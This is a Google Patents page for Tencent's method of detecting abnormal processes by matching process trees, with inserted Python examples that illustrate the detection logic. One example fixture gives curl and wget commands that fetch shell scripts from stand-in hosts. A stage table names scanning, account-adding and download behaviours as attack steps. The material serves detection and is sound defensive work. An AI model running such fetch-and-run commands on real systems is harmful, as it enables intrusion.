CN115827379A - Abnormal process detection method, device, equipment and medium - Google Patents


Info

Publication number: CN115827379A
Authority: CN (China)
Prior art keywords: tree, abnormal, target, node, nodes
Legal status: Pending
Application number: CN202211476713.6A
Other languages: Chinese (zh)
Inventors: 罗梦霞, 任一林
Current Assignee: Tencent Technology Shenzhen Co Ltd
Original Assignee: Tencent Technology Shenzhen Co Ltd
Application filed by Tencent Technology Shenzhen Co Ltd
Priority to CN202211476713.6A
Publication of CN115827379A

Classification: Testing And Monitoring For Control Systems (AREA)

Abstract

The application relates to an abnormal process detection method, device, equipment and medium. The method comprises the following steps: acquiring a target process tree constructed from the generation relations among a plurality of processes, where the target process tree comprises process nodes and a generation relation exists between any two process nodes that share an edge; matching each process node in the target process tree against the process nodes in a pre-constructed abnormal process tree library to obtain the matched abnormal process nodes; performing preliminary anomaly detection on the target process tree based on the connectivity between the abnormal process nodes; when the preliminary detection finds the target process tree abnormal, mapping the process behavior characteristics of each abnormal process node to the attack stage corresponding to that node; and performing advanced anomaly detection on the target process tree according to the attack stages of the abnormal process nodes in the tree, to obtain an anomaly detection result for the target process tree. By adopting the method, the accuracy of abnormal process detection can be improved.

Description

Abnormal process detection method, device, equipment and medium
Technical Field
The present application relates to computer technologies, and more particularly, to a method, an apparatus, a device, and a medium for detecting an abnormal process in the field of data security.
Background
With the development of computer technology, abnormal process detection has emerged: the detection of anomalies in the processes received by a computer device. For example, a large amount of important data is stored on cloud hosts, so anomaly detection must be performed on the processes a cloud host receives, and a process detected as anomalous must be intervened in, so as to prevent security risk events such as virus propagation, vulnerability exploitation and data leakage and thereby keep the data on the cloud host secure.
In conventional technology, single-point detection is usually used: whether a process is abnormal is decided from the process data of that single process alone. This easily causes false positives or misses, so the detection accuracy is low.
Disclosure of Invention
Accordingly, it is desirable to provide an abnormal process detection method, an abnormal process detection apparatus, an abnormal process detection device, and an abnormal process detection medium, which can improve the accuracy of abnormal process detection.
In a first aspect, the present application provides a method for detecting an abnormal process, where the method includes:
acquiring a target process tree constructed based on a generation relation among a plurality of processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing a common edge in the target process tree;
matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node;
performing preliminary anomaly detection on the target process tree based on the connectivity between the abnormal process nodes;
under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node;
and performing advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree to obtain an anomaly detection result aiming at the target process tree.
In a second aspect, the present application provides an abnormal process detecting apparatus, including:
the acquisition module is used for acquiring a target process tree constructed based on the generation relationship among a plurality of processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing a common edge in the target process tree;
the matching module is used for respectively matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node;
the detection module is used for carrying out preliminary anomaly detection on the target process tree based on the connectivity between the abnormal process nodes;
the mapping module is used for mapping the process behavior characteristics corresponding to the abnormal process node under the condition of preliminarily detecting the abnormality of the target process tree to obtain an attack stage corresponding to the abnormal process node;
the detection module is further configured to perform advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree, so as to obtain an anomaly detection result for the target process tree.
In one embodiment, the mapping module is further configured to determine a mapping relationship between preset process behavior characteristics and an attack phase; and aiming at each abnormal process node, determining an attack stage mapped with the process behavior characteristics corresponding to the abnormal process node based on the mapping relation, and obtaining the attack stage corresponding to the abnormal process node.
In an embodiment, the detection module is further configured to determine that the target process tree is abnormal if at least one stage of the execution type exists among the attack stages corresponding to the abnormal process nodes in the target process tree.
In one embodiment, the target process tree includes at least one process chain; each process chain comprises at least one process node; the device further comprises:
the merging module is used for generating corresponding single-point alarm information for each abnormal process node in the target process tree; after advanced detection finds the target process tree abnormal, for each process chain in the target process tree, connecting in series the single-point alarm information of each abnormal process node on that chain to obtain the alarm information corresponding to the process chain; and merging the alarm information of all process chains in the target process tree to obtain target alarm information, and outputting the target alarm information.
In one embodiment, the apparatus further comprises:
the first construction module is used for acquiring at least one piece of historical alarm information; the historical alarm information is obtained by performing anomaly detection on each process node in at least one historical process tree; for each piece of historical alarm information, determining the process node that the historical alarm information targets, to obtain the alarm process node corresponding to that historical alarm information, and extracting from the process tree containing the alarm process node the process subtree that takes the alarm process node as its new root node, to obtain the process subtree corresponding to that historical alarm information; and constructing the abnormal process tree library from the process subtrees corresponding to the respective pieces of historical alarm information.
In one embodiment, the detection module is further configured to determine the connected abnormal process nodes from the matched abnormal process nodes to obtain target abnormal process nodes; and if the number of the target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
In one embodiment, the detection module is further configured to determine connected abnormal process nodes from the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes; determining abnormal process nodes with the same process behavior characteristics from the plurality of candidate abnormal process nodes; and removing the duplication of the abnormal process nodes with the same process behavior characteristics to obtain target abnormal process nodes.
In an embodiment, the matching module is further configured to compare, for each process node in the target process tree, the process behavior characteristics of that process node with the process behavior characteristics of each process node in the abnormal process tree library, and to take each process node in the target process tree whose characteristics match as an abnormal process node.
In one embodiment, process behavior characteristics are stored in the process nodes of the target process tree; the stored process behavior characteristics are extracted based on the process command corresponding to the process node; the device further comprises:
the second construction module is used for acquiring an initial process tree constructed from the generation relations among the processes; the initial process tree comprises at least one process node storing a process command, and a generation relation exists between two process nodes sharing a common edge in the initial process tree; performing homogenization conversion on the process commands stored in the process nodes of the initial process tree that have different forms but the same function, so that all process commands with the same function take the same form, to obtain a homogenized process tree; and performing feature extraction on the process commands in the process nodes of the homogenized process tree to obtain process behavior characteristics, and constructing the target process tree from those process behavior characteristics.
In one embodiment, the process nodes of the target process tree further store the command parameters corresponding to the process commands; the stored process behavior characteristics are extracted from the process command of the process node together with the command parameters of that command; the second construction module is further used for performing feature extraction on the command parameters of the process nodes in the homogenized process tree to obtain command parameter features, performing feature extraction on the process command and the command parameter features in each process node to obtain the process behavior characteristics, and constructing the target process tree from those process behavior characteristics.
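The two paragraphs above describe homogenizing process commands (different form, same function) and then extracting behavior characteristics from the command and its parameters. The following is an added example, not code from the patent or from Tencent: the alias table, the parameter feature levels (flag, ipv4, url, path, literal) and the tuple shape of the behavior feature are all assumptions, since the page does not reproduce FIG. 8 or the actual conversion rules.

```python
import os
import re
from ipaddress import ip_address

# Assumed alias table: command spellings of different form but the same function
# (interpreter versions, two download clients) are mapped to one canonical name.
COMMAND_ALIASES = {
    "python2": "python",
    "python3": "python",
    "curl": "fetch",
    "wget": "fetch",
}

IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://")


def homogenize_command(command):
    """Strip the executable path and map known aliases to one canonical name."""
    name = os.path.basename(command)
    return COMMAND_ALIASES.get(name, name)


def parameter_feature(param):
    """Assumed feature levels for one command parameter: the concrete value is
    replaced by the kind of value, so two attacks using different hosts or files
    still produce the same feature."""
    if param.startswith("-"):
        return "flag"
    if IPV4_RE.match(param):
        try:
            ip_address(param)
            return "ipv4"
        except ValueError:
            pass  # looks like dotted digits but is not a valid address
    if URL_RE.match(param):
        return "url"
    if "/" in param or param.startswith("."):
        return "path"
    return "literal"


def extract_behavior_feature(command, params):
    """Process behavior characteristic = (canonical command, sorted set of parameter features)."""
    kinds = tuple(sorted({parameter_feature(p) for p in params}))
    return (homogenize_command(command), kinds)


def homogenize_tree(initial_tree):
    """initial_tree: {node_id: (process command, [command parameters])}.
    Returns {node_id: behavior feature}, i.e. the node payload of the target process tree."""
    return {node: extract_behavior_feature(cmd, params)
            for node, (cmd, params) in initial_tree.items()}


# Constructed sample: two nodes that download the same kind of resource with
# different tools and different spellings; after homogenization they match.
SAMPLE_INITIAL_TREE = {
    2: ("/usr/bin/curl", ["-O", "http://203.0.113.5/x.sh"]),
    9: ("wget", ["-q", "http://example.test/y.sh"]),
}

if __name__ == "__main__":
    for node, feature in homogenize_tree(SAMPLE_INITIAL_TREE).items():
        print(node, feature)
```

Because the library match in step 204 compares behavior characteristics for equality, the quality of the homogenization rules directly controls the false-negative rate: every spelling of a command that the rules miss is a node the library can never match.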
In one embodiment, the apparatus further comprises:
the updating module is used, when the anomaly detection result indicates that the target process tree is abnormal but the target process tree is not actually abnormal, for determining the process node in the abnormal process tree library that caused the target process tree to be judged abnormal and deleting that process node, which caused the false alarm, so as to update the abnormal process tree library.
In one embodiment, the obtaining module is further configured to obtain a target process tree of the host; the target process tree is constructed according to the generation relationship among a plurality of processes running on the host; the detection module is further configured to determine that a process attacking the host exists in the plurality of processes if the anomaly detection result for the target process tree indicates that the target process tree is anomalous.
In a third aspect, the present application provides a computer device comprising a memory and a processor, wherein the memory stores a computer program, and the processor implements the steps in the method embodiments of the present application when executing the computer program.
In a fourth aspect, the present application provides a computer-readable storage medium storing a computer program which, when executed by a processor, performs the steps in the method embodiments of the present application.
In a fifth aspect, the present application provides a computer program product comprising a computer program which, when executed by a processor, performs the steps in the method embodiments of the present application.
In the abnormal process detection method, device, equipment, medium and computer program product described above, a target process tree constructed from the generation relations among a plurality of processes is obtained; the target process tree comprises at least one process node. Each process node in the target process tree is matched against the pre-constructed abnormal process tree library, and because every process node in that library is abnormal, the abnormal process nodes in the target process tree can be determined more accurately. Preliminary anomaly detection of the target process tree is then carried out based on the connectivity between the abnormal process nodes, so that whether the target process tree is abnormal can be accurately detected in a preliminary way. When the preliminary detection finds the target process tree abnormal, the process behavior characteristics of each abnormal process node are mapped to the attack stage corresponding to that node. Because a generation relation exists between any two process nodes sharing an edge in the target process tree, advanced anomaly detection based on the attack stages of the abnormal process nodes considers the attack process to which those nodes belong as a whole, so the anomaly detection result for the target process tree is obtained accurately and the detection accuracy for abnormal processes is improved.
Drawings
FIG. 1 is a diagram of an exemplary implementation of a method for detecting abnormal processes;
FIG. 2 is a flowchart illustrating a method for detecting an abnormal process according to an embodiment;
FIG. 3 is a diagram of a target process tree structure in one embodiment;
FIG. 4 is a diagram illustrating a mapping relationship between process behavior characteristics and attack phases in an embodiment;
FIG. 5 is a diagram illustrating alarm information for conventional single point detection in one embodiment;
FIG. 6 is a diagram illustrating an exemplary display of alarm information according to the present application;
FIG. 7 is a diagram of process nodes in communication in one embodiment;
FIG. 8 is a diagram illustrating feature extraction levels for command parameters in one embodiment;
FIG. 9 is a block diagram that illustrates an overall framework for abnormal process detection, in accordance with an embodiment;
FIG. 10 is a flowchart illustrating a method for detecting an abnormal process in another embodiment;
FIG. 11 is a block diagram showing an example of the structure of an abnormal process detecting apparatus;
FIG. 12 is a diagram showing an internal structure of a computer device in one embodiment;
FIG. 13 is a diagram showing an internal structure of a computer device in another embodiment.
Detailed Description
In order to make the objects, technical solutions and advantages of the present application more apparent, the present application is described in further detail below with reference to the accompanying drawings and embodiments. It should be understood that the specific embodiments described herein are merely illustrative of the present application and are not intended to limit the present application.
The abnormal process detection method provided by the application can be applied to the application environment shown in FIG. 1, in which the terminal 102 communicates with the server 104 via a network. The data storage system may store data that the server 104 needs to process; it may be integrated on the server 104, or placed on the cloud or another server. The terminal 102 may be, but is not limited to, a desktop computer, notebook computer, smart phone, tablet computer, internet of things device or portable wearable device; the internet of things device may be a smart speaker, smart television, smart air conditioner, smart vehicle-mounted device and the like, and the portable wearable device may be a smart watch, smart bracelet, head-mounted device and the like. The server 104 may be an independent physical server, a server cluster or distributed system formed by a plurality of physical servers, or a cloud server providing cloud services, cloud databases, cloud computing, cloud functions, cloud storage, network services, cloud communication, middleware services, domain name services, network security services such as cloud security and host security, a CDN, and basic cloud computing services such as big data and artificial intelligence platforms. The terminal 102 and the server 104 may be connected directly or indirectly through wired or wireless communication, and the application is not limited in this respect.
The server 104 may obtain a target process tree constructed from the generation relations among a plurality of processes; the target process tree comprises at least one process node, and a generation relation exists between two process nodes that share a common edge in the target process tree. The server 104 may match each process node in the target process tree against the process nodes in a pre-constructed abnormal process tree library to obtain the matched abnormal process nodes, and perform preliminary anomaly detection on the target process tree based on the connectivity between the abnormal process nodes. When the preliminary detection finds the target process tree abnormal, the server 104 can map the process behavior characteristics of each abnormal process node to the attack stage corresponding to that node, and perform advanced anomaly detection on the target process tree according to the attack stages of the abnormal process nodes in the tree to obtain an anomaly detection result for the target process tree.
It is understood that the server 104 may send the anomaly detection result for the target process tree to the terminal 102 for display. The application scenario in FIG. 1 is only an illustrative example, and the embodiments are not limited to it.
It should be noted that some embodiments of the abnormal process detection method in the present application use artificial intelligence techniques. For example, the command parameter features in the present application are obtained by using an artificial intelligence technique to perform feature extraction on the command parameters of the process nodes in the homogenized process tree.
In one embodiment, as shown in fig. 2, an abnormal process detection method is provided, and the method is applicable to a computer device, where the computer device may be a terminal or a server, and is executed by the terminal or the server itself, or may be implemented through interaction between the terminal and the server, and includes the following steps:
Step 202, acquiring a target process tree constructed from the generation relations among a plurality of processes; the target process tree comprises at least one process node, and a generation relation exists between two process nodes that share a common edge in the target process tree.
A process is the running activity of a program in a computer device on a specific data set, and is the basic unit of resource allocation and scheduling in a system. A process node is the node abstracted from a process. A process tree is a tree structure made up of at least one process node and is used to represent the relationships between processes visually. The target process tree is the process tree on which anomaly detection is to be performed. A generation relation exists between two process nodes on a common edge in the target process tree: the two process nodes are connected in a single direction through that edge, and are respectively a parent process node and a child process node. The parent process node and the child process node are directly connected through an edge, and that edge represents the generation relation between them. The generation relation means that the child process node exists only if its parent process node exists; if the parent process node does not exist, the child process node is not generated. The target process tree includes at least one process chain, each process chain including at least one process node, and each process node in a process chain corresponds to one operation step. A penetration attack on a computer device may comprise a plurality of operation steps, and such an attack may be carried out through a process attack chain formed by those operation steps; a penetration attack is a systematic, progressive, composite attack.
In one embodiment, as shown in FIG. 3, the target process tree includes 10 process nodes. A generative relationship exists between two process nodes on a common edge in the target process tree, for example, a generative relationship exists between the process node 1 and the process node 2, and a generative relationship exists between the process node 2 and the process node 8. The target process tree includes six process chains, where the first process chain includes process node 1, process node 2, and process node 8. The second process chain includes process node 1 and process node 3. The third process chain includes process node 1, process node 4, and process node 9. The fourth process chain includes process node 1 and process node 5. The fifth process chain includes process node 1 and process node 6. The sixth process chain includes process node 1, process node 7, and process node 10. It can be understood that each process node in each process chain corresponds to each operation step.
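The FIG. 3 walk-through above enumerates the six process chains of a ten-node tree, and the merging module described earlier in the apparatus section connects the single-point alarms of the abnormal nodes on each chain in series before merging the chains. The following added example (not code from the patent or from Tencent) rebuilds the FIG. 3 tree from its edges, derives the chains, and performs that per-chain alarm merging; the edge list, the abnormal-node features and the alarm text format are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample: the ten-node tree of FIG. 3 as (parent, child) edges,
# listed in the order the figure's description gives the chains.
FIG3_EDGES = [(1, 2), (1, 3), (1, 4), (1, 5), (1, 6), (1, 7), (2, 8), (4, 9), (7, 10)]


def build_children(edges):
    """Adjacency map parent -> [children] in edge order."""
    children = defaultdict(list)
    for parent, child in edges:
        children[parent].append(child)
    return children


def find_root(edges):
    """The single node that is a parent but never a child."""
    roots = {p for p, _ in edges} - {c for _, c in edges}
    if len(roots) != 1:
        raise ValueError("a process tree has exactly one root, got %r" % sorted(roots))
    return roots.pop()


def process_chains(edges):
    """Every root-to-leaf path; each path is one process chain of operation steps."""
    children = build_children(edges)
    chains = []

    def walk(node, path):
        path = path + [node]
        if not children[node]:
            chains.append(path)
            return
        for child in children[node]:
            walk(child, path)

    walk(find_root(edges), [])
    return chains


def single_point_alarm(node, feature):
    """Single-point alarm information for one abnormal node (format is an assumption)."""
    return "node %d: %s" % (node, feature)


def merge_alarms(edges, abnormal_features):
    """abnormal_features: {node: behavior feature} of the matched abnormal nodes.
    Returns (alarm per chain that carries abnormal nodes, merged target alarm)."""
    per_chain = []
    for chain in process_chains(edges):
        alarms = [single_point_alarm(n, abnormal_features[n])
                  for n in chain if n in abnormal_features]
        if alarms:
            per_chain.append(" -> ".join(alarms))  # series connection along one chain
    return per_chain, "\n".join(per_chain)


if __name__ == "__main__":
    # Constructed sample: nodes 2, 8 and 9 matched the abnormal process tree library.
    sample = {2: "scan_ports", 8: "download_file", 9: "modify_permission"}
    for chain in process_chains(FIG3_EDGES):
        print(chain)
    print(merge_alarms(FIG3_EDGES, sample)[1])
```

Compared with the one-alert-per-process output of single-point detection (FIG. 5), an analyst reading the merged alarm sees the order of steps along each chain, which is the context needed to judge whether the chain is an attack.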
In one embodiment, a plurality of processes can run on a computer device, the computer device can acquire the plurality of processes running locally and determine a generation relationship among the plurality of processes, and the computer device can construct a target process tree based on the generation relationship among the plurality of processes. It is to be understood that the plurality of processes running on the computer device may specifically be a plurality of processes running on the computer device within a preset time period, that is, the plurality of processes running on the computer device may be processes respectively running on the computer device at different time points.
In one embodiment, the computer device may further directly obtain a target process tree constructed based on a generative relationship among the plurality of processes from a third-party device. It will be appreciated that the process of building the target process tree may be performed not on a computer device, but on a third party device. Specifically, the computer device may run a plurality of processes, the third-party device may obtain the plurality of processes from the computer device, and determine a generation relationship among the plurality of processes, and the third-party device may construct the target process tree based on the generation relationship among the plurality of processes.
Step 204, matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node.
The abnormal process tree library is a database formed by abnormal process trees. It can be understood that the abnormal process tree library includes at least one abnormal process tree, and a process corresponding to a process node in the abnormal process tree is an abnormal process. And the abnormal process node is a process node which is in the target process tree and is matched with the process node in the abnormal process tree library, and it can be understood that the process corresponding to the abnormal process node in the target process tree is considered to be abnormal.
In one embodiment, the process node of the target process tree and the process node in the abnormal process tree library both store corresponding process behavior characteristics, and it can be understood that the process behavior characteristics are extracted based on the process data corresponding to the corresponding process node. The computer device can match each process node in the target process tree with a process node in a pre-constructed abnormal process tree library respectively based on the process behavior characteristics stored in the process node of the target process tree and the process behavior characteristics stored in the process node in the abnormal process tree library to obtain the matched abnormal process node. Wherein the process data is operation data related to the process.
In one embodiment, process data is stored both in the process nodes of the target process tree and in the process nodes of the abnormal process tree library. For each process node in the target process tree, the computer device may compare the process data in that process node with the process data of each process node in the abnormal process tree library, and take each process node in the target process tree whose data matches as an abnormal process node.
In one embodiment, the process data includes process commands. In one embodiment, the process data includes, in addition to the process command, the command parameters corresponding to the process command. The process command is a computer instruction in a process, and the command parameters are the operating parameters of the process command. For example, if the process command is https (Hypertext Transfer Protocol Secure), the command parameter corresponding to https may be a specific IP (Internet Protocol) address.
Step 206, performing preliminary anomaly detection on the target process tree based on the connectivity between the abnormal process nodes.
Two process nodes are considered connected if a direct edge joins them. Preliminary anomaly detection is a first-pass detection on the target process tree: a positive preliminary result only indicates that the target process tree may be abnormal, and cannot by itself determine whether the target process tree is in fact abnormal.
Specifically, the computer device may determine connectivity conditions between the abnormal process nodes and perform preliminary anomaly detection on the target process tree based on the connectivity conditions between the abnormal process nodes.
In one embodiment, if there are connected abnormal process nodes in the target process tree, the target process tree is preliminarily determined to be abnormal.
Step 208, under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node.
The attack stage refers to a stage in which a process corresponding to the abnormal process node is located in an attack process. The attack phase may include at least one of an information detection type phase, a persistence type phase, an execution type phase, and the like. The information detection type stage refers to a stage including an information detection type behavior in an attack process. The persistent type phase refers to a phase including a persistent type behavior in an attack process. The phase of the execution type refers to a phase including an action of the execution type in the attack process.
In one embodiment, the information probing type behavior may include obtaining at least one of port information and vulnerability information of an attack object. The persistence type of behavior may include at least one of adding an operation to the object and modifying rights to the object, and the like. The execution type of behavior may include at least one of downloading a file, compiling and decompressing, and the like.
Specifically, under the condition of preliminarily detecting the abnormality of the target process tree, for each abnormal process node in the target process tree, the computer device may determine the process behavior characteristics corresponding to the abnormal process node, and map the process behavior characteristics corresponding to the abnormal process node to obtain the attack stage corresponding to the abnormal process node.
In one embodiment, mapping the process behavior characteristics corresponding to the abnormal process node to obtain the attack stage corresponding to the abnormal process node includes: determining a mapping relation between preset process behavior characteristics and an attack stage; and aiming at each abnormal process node, determining an attack stage mapped with the process behavior characteristics corresponding to the abnormal process node based on the mapping relation, and obtaining the attack stage corresponding to the abnormal process node. In this embodiment, the attack stage mapped with the process behavior feature corresponding to the abnormal process node is determined according to the preset mapping relationship between the process behavior feature and the attack stage, so that the acquisition accuracy of the attack stage corresponding to the abnormal process node can be improved.
In one embodiment, the mapping table shown in fig. 4 records a mapping relationship between preset process behavior characteristics and attack phases. Based on the mapping relation recorded in the mapping table, the computer device can determine the attack stage mapped with the process behavior characteristics corresponding to the abnormal process node to obtain the attack stage corresponding to the abnormal process node.
Step 210: perform advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree, so as to obtain an anomaly detection result for the target process tree.
Specifically, the target process tree is constructed from generative relationships between a plurality of processes running on the computer device. The computer equipment can carry out advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree, and obtain an anomaly detection result aiming at the target process tree. And if the abnormality detection result aiming at the target process tree indicates that the target process tree is abnormal, judging that a process for attacking the computer equipment exists in a plurality of processes running on the computer equipment. And if the abnormal detection result aiming at the target process tree indicates that the target process tree is normal, judging that the process for attacking the computer equipment does not exist in the plurality of processes running on the computer equipment.
In one embodiment, if a stage of a preset type exists in an attack stage corresponding to each abnormal process node in a target process tree, it is determined that the target process tree is abnormal. And if the stage of the preset type does not exist in the attack stage corresponding to each abnormal process node in the target process tree, judging that the target process tree is normal.
In the abnormal process detection method, a target process tree constructed based on a generation relation among a plurality of processes is obtained, the target process tree comprising at least one process node. Each process node in the target process tree is matched with the process nodes in the abnormal process tree library; because each process node in the abnormal process tree library is abnormal, the abnormal process nodes in the target process tree can be determined more accurately. Preliminary anomaly detection of the target process tree is then carried out based on the connectivity condition between the abnormal process nodes, so that whether the target process tree is abnormal can be accurately detected at the preliminary stage. Under the condition of preliminarily detecting the abnormality of the target process tree, the process behavior characteristics corresponding to each abnormal process node are mapped to obtain the attack stage corresponding to that abnormal process node. Because a generation relation exists between two process nodes on a common edge in the target process tree, performing advanced anomaly detection on the target process tree through the attack stages corresponding to the abnormal process nodes comprehensively considers the information of the attack process corresponding to those nodes, so the anomaly detection result for the target process tree can be obtained accurately and the detection accuracy for abnormal processes is improved.
In one embodiment, performing advanced anomaly detection on a target process tree according to the attack stages corresponding to each abnormal process node in the target process tree, to obtain an anomaly detection result for the target process tree, includes: if at least one stage belonging to the execution type exists among the attack stages respectively corresponding to the abnormal process nodes in the target process tree, judging that the target process tree is abnormal.
Specifically, the attack phase may include at least one of an information detection type phase, a persistence type phase, an execution type phase, and the like. If at least one stage belonging to the execution type exists in the attack stages respectively corresponding to all abnormal process nodes in the target process tree, the computer equipment can judge that the target process tree is abnormal. On the contrary, it can be understood that if the attack phase corresponding to each abnormal process node in the target process tree has the phase of the information detection type and the phase of the persistence type, but does not have the phase of the execution type, the computer device may determine that the target process tree is normal.
It can be understood that the attack process is a chain, the complete attack chain has a networking behavior for acquiring resources, and after the resources are acquired, the execution type behavior is started. If the target process tree is detected to be abnormal preliminarily and the attack process corresponding to the target process tree includes suspicious behaviors before and after networking, which indicates that the probability of the abnormality of the target process tree is very high, the abnormality of the target process tree can be further determined. It is to be appreciated that suspicious behavior can include at least one of the above-described information detection type of behavior, persistence type of behavior, execution type of behavior, and the like.
In the above embodiment, whether the target process tree is abnormal is determined by determining whether the attack stage corresponding to each abnormal process node in the target process tree has the stage of the execution type, so that the detection accuracy rate for the abnormal process can be further improved.
In one embodiment, the target process tree includes at least one process chain; each process chain comprises at least one process node; the method further comprises the following steps: generating corresponding single-point alarm information for each abnormal process node in the target process tree; after advanced anomaly detection determines that the target process tree is abnormal, for each process chain in the target process tree, connecting the single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain the alarm information corresponding to the process chain; and merging the alarm information corresponding to each process chain in the target process tree to obtain and output target alarm information.
The single-point alarm information is alarm information generated for a single abnormal process node, and it can be understood that one abnormal process node corresponds to one single-point alarm information. The target alarm information is alarm information generated for a target process tree, and it can be understood that one target process tree corresponds to one piece of target alarm information.
Specifically, after each process node in the target process tree is respectively matched with a process node in the abnormal process tree library to obtain the matched abnormal process nodes, the computer device may generate corresponding single-point alarm information for each abnormal process node in the target process tree. After advanced anomaly detection determines that the target process tree is abnormal, for each process chain in the target process tree, if at least one abnormal process node exists on the process chain, the computer device can connect the single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain the alarm information corresponding to the process chain. Furthermore, the computer device can merge the alarm information corresponding to each process chain in the target process tree, so as to obtain and output the target alarm information for the target process tree. It can be understood that the single-point alarm information corresponding to each abnormal process node is not directly output and displayed to the user; what is finally output and displayed to the user is the target alarm information generated by synthesizing the single-point alarm information corresponding to each abnormal process node.
In the conventional alarm information display of single-point monitoring, as shown in fig. 5, each row in the diagram represents one piece of alarm information obtained by detecting an abnormal process. In the traditional single-point monitoring alarm information display, the four pieces of alarm information are displayed to the user separately, and no relevance exists among them. The alarm information display of the present application, as shown in fig. 6, concatenates and merges the single-point alarm information corresponding to each abnormal process node in the same process tree and outputs the merged target alarm information. It can be understood that, for each abnormal process tree, only one piece of combined alarm information with context information is finally displayed to the user.
In the above embodiment, the single-point alarm information corresponding to each abnormal process node in the process chain is connected in series to obtain the alarm information corresponding to the process chain, and the alarm information corresponding to each process chain in the target process tree is combined to obtain the target alarm information and output the target alarm information. Compared with the traditional single-point detection method that one piece of alarm information is output for each abnormal process, scattered detection result data lack contact with each other, the single-point alarm information corresponding to each abnormal process node on the process chain is connected in series, the scattered detection result data are integrated, and the context information richness of the alarm information is improved.
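The following Python example is added here for illustration and is not code from the patent. It works through the attack-stage mapping, the advanced detection rule (abnormal only if some abnormal node is in an execution-type stage) and the chaining and merging of single-point alarms; the stage mapping table, the process tree and the set of abnormal nodes are all constructed assumptions, not the patent's FIG. 4 data.

```python
from collections import defaultdict

# Constructed mapping from process behaviour features to attack stages.
# The patent's FIG. 4 mapping table is not reproduced; these rows are assumptions.
STAGE_MAP = {
    "nmap PARAM": "information_detection",   # probing ports of the attack object
    "useradd PARAM": "persistence",          # adding an account
    "chmod PARAM": "persistence",            # modifying rights
    "crontab PARAM": "persistence",
    "curl PARAM": "execution",               # downloading a file
    "tar PARAM": "execution",                # decompressing
    "gcc PARAM": "execution",                # compiling
}

# Constructed target process tree: node -> (parent node, process behaviour feature).
TARGET_TREE = {
    "root": (None, "systemd"),
    "s": ("root", "sshd"),
    "a": ("s", "bash"),
    "b": ("a", "nmap PARAM"),
    "c": ("b", "curl PARAM"),
    "d": ("c", "tar PARAM"),
    "e": ("b", "useradd PARAM"),
    "f": ("e", "crontab PARAM"),
    "k": ("root", "cron"),
    "l": ("k", "logrotate"),
}

# Abnormal nodes as they would come out of the matching step (constructed).
ABNORMAL = {"b", "c", "d", "e", "f"}
# Variant with detection and persistence behaviour but no execution-type behaviour.
ABNORMAL_NO_EXECUTION = {"b", "e", "f"}


def stage_of(feature):
    """Map a behaviour feature to its attack stage via the preset mapping table."""
    return STAGE_MAP.get(feature)


def advanced_detect(tree, abnormal):
    """Return (is_abnormal, {node: stage}); abnormal iff some node is in an execution-type stage."""
    stages = {n: stage_of(tree[n][1]) for n in abnormal}
    return any(s == "execution" for s in stages.values()), stages


def children_of(tree):
    ch = defaultdict(list)
    for node, (parent, _) in tree.items():
        if parent is not None:
            ch[parent].append(node)
    return ch


def process_chains(tree):
    """Each root-to-leaf path of the tree is one process chain."""
    ch = children_of(tree)
    chains = []

    def walk(node, path):
        path = path + [node]
        if not ch[node]:
            chains.append(path)
        for child in ch[node]:
            walk(child, path)

    for root in (n for n, (p, _) in tree.items() if p is None):
        walk(root, [])
    return chains


def single_point_alert(tree, node):
    feature = tree[node][1]
    return {"node": node, "feature": feature, "stage": stage_of(feature)}


def target_alert(tree, abnormal):
    """Concatenate single-point alerts along each chain, then merge the chains into one alert.

    Returns None when advanced detection finds the tree normal: nothing is output then."""
    is_abnormal, _ = advanced_detect(tree, abnormal)
    if not is_abnormal:
        return None
    chain_alerts = []
    for chain in process_chains(tree):
        hits = [single_point_alert(tree, n) for n in chain if n in abnormal]
        if hits:  # chains without an abnormal node produce no alert
            chain_alerts.append({"chain": chain, "alerts": hits})
    return {"tree_root": chain_alerts[0]["chain"][0], "chains": chain_alerts}


if __name__ == "__main__":
    print(target_alert(TARGET_TREE, ABNORMAL))
    print(target_alert(TARGET_TREE, ABNORMAL_NO_EXECUTION))
```

The second call returns None: detection and persistence stages alone do not make the tree abnormal, so no alarm is emitted for it.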
In one embodiment, the method further comprises a step of constructing the abnormal process tree library, which comprises: acquiring at least one piece of historical alarm information, the historical alarm information being obtained by respectively carrying out anomaly detection on each process node in at least one historical process tree; for each piece of historical alarm information, determining the process node the historical alarm information was raised for to obtain the alarm process node corresponding to the historical alarm information, and extracting the process subtree that takes the alarm process node as a new root node from the process tree in which the alarm process node is located to obtain the process subtree corresponding to the historical alarm information; and constructing the abnormal process tree library from the process subtrees respectively corresponding to the historical alarm information.
The historical process tree is constructed based on the historical generation relationship among a plurality of processes. It is understood that historical processes refer to processes recorded in the process log prior to abnormal process detection. The alarm process node is the process node in a historical process tree that caused the historical alarm information to be generated. The process subtree is the subtree extracted from the historical process tree with the alarm process node as its root node.
